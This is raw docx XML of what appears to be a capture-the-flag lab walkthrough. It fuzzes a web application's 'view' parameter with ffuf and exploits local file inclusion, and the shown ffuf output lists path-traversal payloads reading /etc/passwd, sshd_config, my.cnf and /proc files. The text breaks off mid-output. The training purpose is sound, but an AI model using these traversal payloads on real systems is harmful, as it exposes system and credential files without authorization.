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B3854A" w14:textId="4553D57D" w:rsidR="007D5956" w:rsidRDefault="000C7F71" w:rsidP="000C7F71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7F71">
        <w:t> Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D3725" w14:textId="68EC97B1" w:rsidR="006B12B5" w:rsidRDefault="006B12B5" w:rsidP="006B12B5">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F659C" w14:textId="75355A1B" w:rsidR="006B12B5" w:rsidRDefault="006B12B5" w:rsidP="006B12B5">
      <w:r w:rsidRPr="006B12B5">
        <w:t>ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u 'http://83.136.248.110:48936/index.php?FUZZ=khanh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B25B87" w14:textId="56CD6176" w:rsidR="006B12B5" w:rsidRDefault="006B12B5" w:rsidP="006B12B5">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11305948" w14:textId="4EFF72AA" w:rsidR="00340F39" w:rsidRDefault="00340F39" w:rsidP="00340F39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38DEC564" wp14:editId="52EF6117">
            <wp:extent cx="5943600" cy="2632075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="988535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357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9375" w14:textId="6F3A71C2" w:rsidR="00291511" w:rsidRDefault="00291511" w:rsidP="00340F39">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457201B4" w14:textId="51BAC632" w:rsidR="00291511" w:rsidRDefault="00291511" w:rsidP="00340F39">
      <w:r w:rsidRPr="00291511">
        <w:t>ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u 'http://83.136.248.110:48936/index.php?FUZZ=khanh' -fs 2309</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E28DB" w14:textId="4FD76666" w:rsidR="00291511" w:rsidRDefault="00291511" w:rsidP="00340F39">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F78FF" w14:textId="5487EEB6" w:rsidR="00291511" w:rsidRDefault="00291511" w:rsidP="00340F39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DDD8DEF" wp14:editId="58432462">
            <wp:extent cx="5943600" cy="2426335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2082558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583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4C50" w14:textId="450C23CD" w:rsidR="003A3425" w:rsidRDefault="003A3425" w:rsidP="00340F39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DC64137" wp14:editId="5F718FD6">
            <wp:extent cx="5943600" cy="3436620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1295551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511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6D2B" w14:textId="063EFD14" w:rsidR="004E1271" w:rsidRDefault="004E1271" w:rsidP="00340F39">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BE775" w14:textId="36884596" w:rsidR="004E1271" w:rsidRDefault="004E1271" w:rsidP="00340F39">
      <w:r w:rsidRPr="004E1271">
        <w:t>ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://83.136.248.110:48936/index.php?view=FUZZ' -fs 1935</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9013FD" w14:textId="09C94FCB" w:rsidR="004E1271" w:rsidRDefault="004E1271" w:rsidP="00340F39">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C8C464" w14:textId="1442CF42" w:rsidR="00757DBC" w:rsidRDefault="00757DBC" w:rsidP="00340F39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6215CB5A" wp14:editId="09EEA1E6">
            <wp:extent cx="5943600" cy="2747010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1953172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725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2499" w14:textId="6984FE09" w:rsidR="00C5152C" w:rsidRDefault="00C5152C" w:rsidP="00340F39">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2EE80" w14:textId="0B2C6DA4" w:rsidR="00C5152C" w:rsidRDefault="00C5152C" w:rsidP="00340F39">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="004D3701">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://83.136.248.110:48936/index.php?view=../../../../../../../../../../../../../../../../../../../FUZZ/index.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="600FA856" w14:textId="074D492D" w:rsidR="00C5152C" w:rsidRDefault="00C5152C" w:rsidP="00340F39">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A5846F" w14:textId="118878B6" w:rsidR="00F34D64" w:rsidRDefault="00F34D64" w:rsidP="00340F39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B8BA1B4" wp14:editId="7CEF33B6">
            <wp:extent cx="5943600" cy="1971040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72931999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19995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0748" w14:textId="077261C2" w:rsidR="00F34D64" w:rsidRDefault="00F34D64" w:rsidP="00340F39">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57406E37" w14:textId="592F971F" w:rsidR="00F34D64" w:rsidRDefault="00F34D64" w:rsidP="00340F39">
      <w:r w:rsidRPr="00F34D64">
        <w:t>ffuf -w /usr/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt -u 'http://83.136.248.110:48936/index.php?view=../../../../../../../../../../../../../../../../../../../FUZZ/index.php' -fs 1935</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA862E8" w14:textId="081BB5A4" w:rsidR="00F34D64" w:rsidRDefault="00F34D64" w:rsidP="00340F39">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702D03C8" w14:textId="344DC5CA" w:rsidR="009247C2" w:rsidRDefault="009247C2" w:rsidP="00340F39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A9ABBA" wp14:editId="21739496">
            <wp:extent cx="5943600" cy="1903730"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="12072075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07515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EC81" w14:textId="67DAE0FC" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00340F39">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731BCBCF" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:t>lyquockhanh)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C66ABFA" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>└─# ffuf -w /root/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://83.136.248.110:48936/index.php?view=../../../../../../../../../../../../../../../../../../../FUZZ' -fs 1935</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E05F53" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13"/>
    <w:p w14:paraId="0FB5D443" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        /'___\  /'___\           /'___\       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9CD166" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve">       /\ \__/ /\ \__/  __  __  /\ \__/       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A25B3" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve">       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A25103B" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve">        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC76DC" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve">         \ \_\   \ \_\  \ \____/  \ \_\       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C989E14" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve">          \/_/    \/_/   \/___/    \/_/       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F53C08" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13"/>
    <w:p w14:paraId="5C0CE5C8" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve">       v2.1.0-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D812A1" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F96AE" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13"/>
    <w:p w14:paraId="71549C80" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: Method           : GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5604CE1D" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: URL              : http://83.136.248.110:48936/index.php?view=../../../../../../../../../../../../../../../../../../../FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116412DE" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: Wordlist         : FUZZ: /root/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47348A71" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: Follow redirects : false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AFE8F1" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: Calibration      : false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088841DE" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: Timeout          : 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E538CBB" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: Threads          : 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164ACCC9" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9EEF65" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t xml:space="preserve"> :: Filter           : Response size: 1935</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4252CE42" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF8846" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13"/>
    <w:p w14:paraId="37DBDE84" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 301ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F435D0" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 306ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC12775" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 305ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C138480" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/apache2/apache2.conf [Status: 200, Size: 9159, Words: 1456, Lines: 283, Duration: 284ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF09E6" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/apt/sources.list   [Status: 200, Size: 4678, Words: 795, Lines: 105, Duration: 293ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBAFDE" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/fstab              [Status: 200, Size: 1972, Words: 520, Lines: 57, Duration: 291ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0356C679" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/group              [Status: 200, Size: 2546, Words: 515, Lines: 104, Duration: 288ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308B5DF" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../etc/hosts [Status: 200, Size: 2173, Words: 520, Lines: 64, Duration: 286ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70360267" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/hosts              [Status: 200, Size: 2173, Words: 520, Lines: 64, Duration: 287ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630713D0" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/hosts.deny         [Status: 200, Size: 2646, Words: 642, Lines: 73, Duration: 286ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21901012" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/hosts.allow        [Status: 200, Size: 2346, Words: 596, Lines: 66, Duration: 286ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC53F88" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/issue              [Status: 200, Size: 1961, Words: 519, Lines: 58, Duration: 301ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602318B3" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/init.d/apache2     [Status: 200, Size: 10116, Words: 2014, Lines: 411, Duration: 301ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D777221" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/nsswitch.conf      [Status: 200, Size: 2445, Words: 645, Lines: 76, Duration: 287ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A62336E" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/mysql/my.cnf       [Status: 200, Size: 2617, Words: 603, Lines: 77, Duration: 292ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145BDBD4" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/./././././././././././etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 286ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230D17D4" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 286ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857E241" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/passwd             [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 287ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FA0F7" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 291ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F1D44" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 283ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB28529" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 292ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB2600" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 298ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD9901" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 283ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E438E63" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 294ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA2955" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 302ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D072A7" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 301ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CB4329" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 294ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC7B92" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 294ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D7DA8" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 306ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A8C45" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 306ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3FEAB" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 307ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7DCA86" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 307ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF5FCE" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 306ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409B35AE" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 307ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6737DE" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 305ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD70975" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../etc/passwd  [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 305ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23927DC3" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 306ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EF546B" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../etc/passwd     [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 305ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098657A7" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../etc/passwd        [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 284ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD5FCA" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../etc/passwd           [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 283ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B06BC0" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>etc/passwd              [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 285ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F227467" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>../../../../../../etc/passwd&amp;=%3C%3C%3C%3C [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 309ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8611F" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/resolv.conf        [Status: 200, Size: 2041, Words: 520, Lines: 59, Duration: 285ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1312A39A" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/rpc                [Status: 200, Size: 2822, Words: 550, Lines: 96, Duration: 285ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1B0D68" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/etc/ssh/sshd_config    [Status: 200, Size: 5224, Words: 808, Lines: 179, Duration: 303ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE2D0B" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/cpuinfo           [Status: 200, Size: 6623, Words: 1091, Lines: 168, Duration: 300ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6372C5CD" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/loadavg           [Status: 200, Size: 1960, Words: 519, Lines: 57, Duration: 300ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451B3C43" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/interrupts        [Status: 200, Size: 5445, Words: 2433, Lines: 100, Duration: 300ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3BAAB" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/meminfo           [Status: 200, Size: 3438, Words: 1026, Lines: 110, Duration: 294ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7D1446" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/net/arp           [Status: 200, Size: 2091, Words: 589, Lines: 58, Duration: 291ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087FBFB0" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
